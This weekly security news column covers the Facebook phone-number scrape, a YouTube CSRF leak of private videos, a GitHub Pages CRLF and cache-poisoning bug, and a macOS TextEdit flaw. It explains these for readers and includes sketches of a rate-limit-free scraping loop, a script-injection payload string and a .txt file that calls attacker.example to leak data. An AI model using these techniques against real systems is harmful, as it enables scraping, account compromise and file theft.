
This Week in Security: The Facebook Leak, The YouTube Leak, and File Type Confusion

Facebook had a problem, way back in the simpler time that was 2019. Something like 533 million accounts had their associated cell phone numbers leaked. It's making security news this week because that database has now been released for free in its entirety. The dataset consists of Facebook ID, cell number, name, location, birthday, bio, and email address. Facebook has pointed out that the data wasn't obtained through a hack or breach, but was simply scraped before a vulnerability was fixed in 2019.

The vulnerability was in Facebook's contact import service, also known as the "Find Friends" feature. The short explanation is that anyone could punch in a random phone number and get a bit of information about the FB account that claimed that number. The problem was that some interfaces to that service didn't have appropriate rate limiting. Combine that with Facebook's constant urging that everyone link a cell number to their account, and the default privacy setting that lets anyone locate you by your cell number, and the data scraping was all but inevitable. The actual technique may have involved spoofing requests so that they appeared to come from the official Facebook app.
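To see why missing rate limiting matters so much, here's a minimal sketch of the kind of enumeration loop it makes possible. The endpoint, request format, and response shape are entirely made up for illustration; this is not Facebook's actual API, just the general shape of the problem.

```typescript
// Hypothetical sketch: a contact-lookup endpoint with no rate limiting can be
// driven through an entire phone number range. URL and payload are invented.
async function lookupNumber(phone: string): Promise<unknown | null> {
  const res = await fetch("https://contacts.example.com/lookup", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ phone }),
  });
  return res.ok ? res.json() : null;
}

async function scrapeRange(prefix: string, count: number): Promise<unknown[]> {
  const hits: unknown[] = [];
  for (let i = 0; i < count; i++) {
    // Enumerate sequential numbers; with no rate limit, the only cap is bandwidth.
    const phone = `${prefix}${String(i).padStart(7, "0")}`;
    const profile = await lookupNumber(phone);
    if (profile !== null) hits.push(profile);
  }
  return hits;
}
```

A per-account or per-IP request cap on the server side is what turns this back from a bulk scraper into a one-at-a-time lookup.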

[Troy Hunt]’s Have I Been Pwned service has integrated this breach and now allows searching by phone number, so go check whether you’re one of the exposed. If you are, keep the leaked data in mind every time an email or phone call comes from someone you don’t know.

Impersonating a TV

[David Schütz] was at a friend’s house, and pulled out his phone to show off a private YouTube video. Google has worked hard to make the Android/Chromecast/Android TV interconnect seamless, and that system was firing on all cylinders. With a simple button press, that private video played on his friend’s smart TV, and it seemed very wrong that this was so easy.

For background, YouTube videos can exist in three states. A public video shows up for everyone, and there are no restrictions on watching it. An unlisted video doesn’t show up in search results or on the channel’s page; you have to have the link to see it. The third option is a private video. These aren’t visible to anyone, even with the direct link. To see a private video, a viewer has to be on the list of allowed viewers. Not on the list? No video for you. So how did a smart TV that wasn’t signed in to an authorized account manage to play the private video? The magic is a token that is generated when a user initiates the cast. This “ctt” token serves as a single-purpose authenticator, allowing the TV to play the user’s private video.
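For a rough model of what such a token does, here's a sketch with names and structure invented for illustration (this is not YouTube's actual API). The important property is that the token, not the account, is what the TV presents:

```typescript
import { randomUUID } from "node:crypto";

// Hypothetical model of a single-purpose cast token: it is tied to one video
// and grants playback of that video (and nothing else) to whoever presents it.
interface CastToken {
  videoId: string;
  issuedTo: string; // the signed-in account that pressed the cast button
}

const tokens = new Map<string, CastToken>();

// Issued when the signed-in user initiates the cast.
function issueCastToken(userId: string, videoId: string): string {
  const ctt = randomUUID();
  tokens.set(ctt, { videoId, issuedTo: userId });
  return ctt;
}

// The TV presents the token instead of account credentials.
function mayPlay(ctt: string, videoId: string): boolean {
  const token = tokens.get(ctt);
  return token !== undefined && token.videoId === videoId;
}
```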

This is a reasonable system, so long as everything is implemented securely. Spoilers: it wasn’t. The problem was a Cross-Site Request Forgery (CSRF) vulnerability. The magic token is only supposed to be generated when a user requests it from YouTube itself. Because that intention wasn’t enforced, any site could request a token, so long as it knew the video ID. Not only does the “cast to TV” process work with individual videos, it works with playlists, and it turns out that every YouTube account has a semi-hidden playlist consisting of every upload.
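For a sense of what enforcing that intention looks like (and roughly what the eventual fix amounts to), here's a generic sketch of CSRF protection on a token-granting endpoint. It is not YouTube's actual code; the names, allow-list, and session handling are all invented for illustration:

```typescript
import { randomBytes, timingSafeEqual } from "node:crypto";

// Only pages served from these origins should be able to ask for a cast token.
const ALLOWED_ORIGINS = new Set(["https://www.youtube.com"]);

// Issue a per-session CSRF token, stored server-side and echoed to the page.
function issueCsrfToken(session: Map<string, string>): string {
  const token = randomBytes(32).toString("hex");
  session.set("csrf", token);
  return token;
}

// A state-changing request (like "mint a ctt for this video") is honored only
// when it comes from an allowed origin AND carries the session's CSRF token.
function isRequestAllowed(
  origin: string | undefined,
  submittedToken: string | undefined,
  session: Map<string, string>,
): boolean {
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return false;

  const expected = session.get("csrf");
  if (!expected || !submittedToken) return false;

  const a = Buffer.from(expected);
  const b = Buffer.from(submittedToken);
  return a.length === b.length && timingSafeEqual(a, b);
}
```

A malicious page can make the victim's browser send the request, but it can't read the CSRF token out of YouTube's pages or forge the browser-set Origin header, so a forged request fails both checks.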

The attack flow goes like this: the victim visits the malicious website, and that site sends off a request for the user’s “uploads” playlist. Since the victim is logged in to YouTube, and the request is coming from their browser, the request is honored. Once the video IDs are known, a ctt token can be generated for each one. And with that, the attacker has access to every video on the victim’s account, even the private ones. The fix was to implement proper CSRF protection and restrict access to the API to the official client. PoC demo below:

CRLF to Access Private Pages

GitHub offers more than just code hosting. They also host GitHub Pages, and one of the features offered there is private pages. You can put together a web interface that uses GitHub accounts for authorization: set up your organization with different roles, and you can restrict the page to users with the appropriate role. GitHub is very interested in keeping those pages secure, so private pages are one of the areas where they offer bug bounties for exploits.

[Robert Chen] had a very boring junior year of high school, thanks to COVID, and took up vulnerability hunting as a hobby. He started looking at GitHub and discovered a quirk. The authentication process sends a page_id value, and that value is embedded in the response. He discovered that he could use URL encoding to embed whitespace in the value. The authentication process would succeed, but the resulting page included the whitespace. This suggests that the value is validated by a toInt()-style function, while the raw, user-supplied value is what actually gets passed on. It’s better practice to convert the parsed integer back to a string and use that as a known-trustworthy value.
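To make that concrete, here's a small sketch of the difference between validating the parsed integer and echoing the raw value. The page_id handling is hypothetical, not GitHub's code; it just shows how a lenient parse lets trailing garbage ride along:

```typescript
// A lenient integer parse accepts trailing garbage, so validation "succeeds"...
const raw = "1234\r\n\u0000<script>/* attacker-controlled */</script>";
const parsed = parseInt(raw, 10); // 1234 -- parsing stops at the first non-digit

// ...but a response built from the *raw* value carries the payload with it.
const unsafeResponse = `page_id: ${raw}`;

// Safer: serialize the parsed integer back to a string and use only that.
const pageId = Number.isInteger(parsed) ? String(parsed) : null;
const safeResponse = pageId !== null ? `page_id: ${pageId}` : "invalid page_id";
```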

The attack is to embed a script tag in that ID in such a way that the authentication logic still succeeds, but the attacker’s code runs on the victim’s page. This is accomplished by a series of Carriage Returns and Line Feeds (CRLF), followed by an encoded null value. The toInt() function stops processing as soon as it sees the null, but the payload is still passed on. The next step was taking advantage of inconsistent case sensitivity: one part of the process sees “__HOST” and “__Host” as identical.

The last piece of the puzzle is cache poisoning. GitHub makes use of caching in the authentication flow, and without the above issues it would be reasonably secure. The cache lookup is based on the result of toInt(), so if an attacker’s malicious request is the one that populated the cache, every visitor could potentially run the embedded script. His research netted him a nice $35,000, and GitHub cleaned up the problems within a month.
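The cache angle is what turns a self-inflicted quirk into something every visitor can hit. A purely illustrative sketch, not GitHub's implementation: the cache key comes from the sanitized integer, but the cached body was rendered from the attacker's raw value.

```typescript
const cache = new Map<string, string>();

// Pretend this builds the authentication response, echoing the raw value (the bug).
function renderPage(rawPageId: string): string {
  return `...page_id=${rawPageId}...`;
}

function handleRequest(rawPageId: string): string {
  // Benign and malicious requests collapse onto the same key, e.g. "1234".
  const key = String(parseInt(rawPageId, 10));
  if (!cache.has(key)) {
    // Whoever gets here first decides what everyone else is served.
    cache.set(key, renderPage(rawPageId));
  }
  return cache.get(key)!;
}

// The attacker primes the cache with the injected payload...
handleRequest("1234\r\n\u0000<script>evil()</script>");
// ...and a later victim asking for the same page_id receives it.
const victimSees = handleRequest("1234");
```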

When a .txt File Is HTML

How does an OS determine what to do with a given file? The two primary approaches are the filename extension and the contents of the file, and sometimes the exact response is determined by a combination of both. It’s potentially complicated, and such complications can give rise to security issues. Case in point: CVE-2019-8761. As you might notice from the year embedded in the CVE, [Paulos Yibelo] didn’t get into a huge hurry to publish his work. That aside, this CVE is all about how macOS handles .txt files that contain HTML code.

TextEdit is the default program used to open a text document, but it has support for bold text, different text colors, and so on. In short, there’s more going on than raw text editing. The question then becomes: how much will TextEdit let you get away with? Quite a bit. If that text file starts out with HTML markup, like an opening <html> tag, TextEdit parses the HTML rather than letting the user edit it. It’s not quite broken enough to run JavaScript, but there are still some shenanigans to be had. Inside a pair of style tags, it’s possible to import an external stylesheet. While that imported stylesheet is external to the .txt file, it is still limited to the local filesystem. This would be the end of the story, and the most we could do is something mischievous like including /dev/urandom and crashing the machine.

macOS has an interesting feature called AutoFS, which allows auto-mounting remote locations onto the local filesystem. This feature doesn’t require any special privileges, so it’s easy enough to include a file from a remote server that you control. That’s enough to do something interesting. [Paulos] drops a casual bombshell: he also happened to find a way for a website to automatically download a .txt file and open it without any user interaction. So armed with this knowledge, an attacker could host a simple text file on a Tor service and collect the real IP addresses of each visitor.
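Putting the pieces together, the whole attack fits in a file small enough to type by hand. Here's a hypothetical payload sketch, assembled as a string so we can stay in one language; the exact markup TextEdit accepted and the /net/<host>/<export> AutoFS path layout are assumptions drawn from the write-up, not a tested exploit:

```typescript
import { writeFileSync } from "node:fs";

// Hypothetical .txt payload: TextEdit sees the HTML markup and renders it,
// and the @import nudges AutoFS into mounting the attacker's export on demand,
// so a network request leaves the machine the moment the file is opened.
const payload = `<html>
<head>
<style>
@import url("file:///net/attacker.example/export/beacon.css");
</style>
</head>
</html>`;

writeFileSync("innocent-looking.txt", payload);
```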

If that wasn’t enough, a bit of trickery with an unclosed style tag allows our rogue text file to include the contents of a local file as part of the request. The result is that any file the TextEdit process can read, it can also upload to the attacker. The final macOS quirk to make this even more interesting? Gatekeeper, the part of the OS that tries to prevent running potentially malicious code, totally ignores .txt files. [Paulos] privately reported his findings to Apple in 2019, and he believes the issue was fixed in 2019 or early 2020.

Google’s Hard Decision Ends an Op

A couple of weeks ago, news broke about who was behind a series of attacks covered by Google’s Project Zero. The attacks in question were a counter-terrorism operation run by a Western government. Google discovered the attack, reverse-engineered the vulnerabilities, and made them public without providing any details about who was behind them. It’s become controversial because this action likely killed the op before it got results. It raises an interesting question: what are the responsibilities of a researcher who finds a vulnerability being used by a friendly government? Even when the researcher believes in the mission of the operation in question?

Google seems to have taken a justice-is-blind sort of approach: if they find the attack happening, they respond the same way, regardless of who is behind it. I suspect that this is based partly on the assumption that if Google has detected and reverse-engineered the attack, so have the usual suspects. If they sit on the findings, the op can continue, but APT groups from less friendly countries could reverse-engineer and use the exploits as well. What do you think, Hackaday: should Project Zero sit on vulnerabilities if a friendly government is behind the exploits? [Editor’s bonus question: should “friendly” governments, tasked with protecting the security of their own citizens’ Internet, sit on vulnerabilities? If “yes”, with what oversight?] Let us know what you think about that and the rest of the stories below!

